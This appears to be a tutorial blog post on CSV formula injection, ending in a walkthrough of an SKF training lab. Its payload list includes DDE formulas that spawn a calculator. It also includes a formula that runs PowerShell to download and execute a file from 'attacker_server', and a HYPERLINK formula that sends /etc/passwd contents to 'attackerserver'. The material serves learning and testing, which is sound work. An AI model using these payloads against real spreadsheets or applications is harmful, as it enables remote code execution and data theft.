CSV injection might sound complex, but it’s easier to grasp than you think. Essentially, it involves slipping malicious formulas into CSV files. When opened in a spreadsheet program, these formulas execute. They can do all sorts of nasty things. Here’s a closer look at how it all works:
What is CSV?
CSV stands for Comma Separated Values. Think of it as a simple text file. It stores data in a table format. Each line in the file represents a row in the table. Columns are separated by commas. CSV files are commonly used to exchange data between different applications. They can be used for exporting contact lists, financial records, and more.
How CSV Injection Works
Imagine you have a website that lets users enter their name and email. An attacker might enter the following in the name field:
=cmd|’/C calc’!A0
When the website exports this data to a CSV file and someone opens it in Excel, Excel tries to run the formula. In this case, it might try to open the calculator on Windows.
Common Attack Vectors
Where do these vulnerabilities pop up? User profile data is a big one. Imagine a website that allows users to export their profile information as a CSV file. If the website doesn’t properly sanitize the data, an attacker can inject malicious code into their profile fields. Contact forms are another common target. Attackers might enter formulas into form fields like name or email address. When the data is exported to a CSV file, the injected formulas are ready to strike.
Where can you look for CSV injection?
Always look for user’s profile sections, admin account, and also look where the data transfer and exported the data into CSV file.
Common Payloads of CSV injection:
- Spawn a calc
DDE (“cmd”;”/C calc”;”!A0″)A0
@SUM(1+1)*cmd|’ /C calc’!A0
=2+5+cmd|’ /C calc’!A0
=cmd|’ /C calc’!’A1′
- PowerShell download and execute
=cmd|’/C powershell IEX(wget attacker_server/shell.exe)’!A0
- Data theft
=HYPERLINK(CONCATENATE(“http://attackerserver:port/a.txt?v=”; (‘file:///etc/passwd’#$passwd.A1)); “poc”)
Now, let’s take a simple and quick practical example
In, this case we are gonna use SKF labs and I pretty sure if you completed all the SKF labs you get an advance knowledge of web-applications vulnerability.
The first step is to identify input forms and parameters that can be exported as CSV, XLS, XLSX or ODS. In this example we find that it’s possible to add new pages and, after clicking on the button “Export pages”, generate a XLS report of all pages.
Step_2: Now let’s see if we can inject a simple spreadsheet formula.
The page “Injection2” was created and the formula was fully accepted.
Of course the formula has no effect on browser. This test is important for us to know the application is not validating the operator “=”, so it can be used to inject formulas in our spreadsheet.
Step_3: Now, let’s export the pages and see in our spreadsheet application (Excel, Calc) how does the formula injection look like.
Now see here in the spreedsheet application the formula was executed
So, this is a basic lab where I perform
Now, for your practice I was suggest you go and solves the lab and make your skilled full in CSV vulnerability.
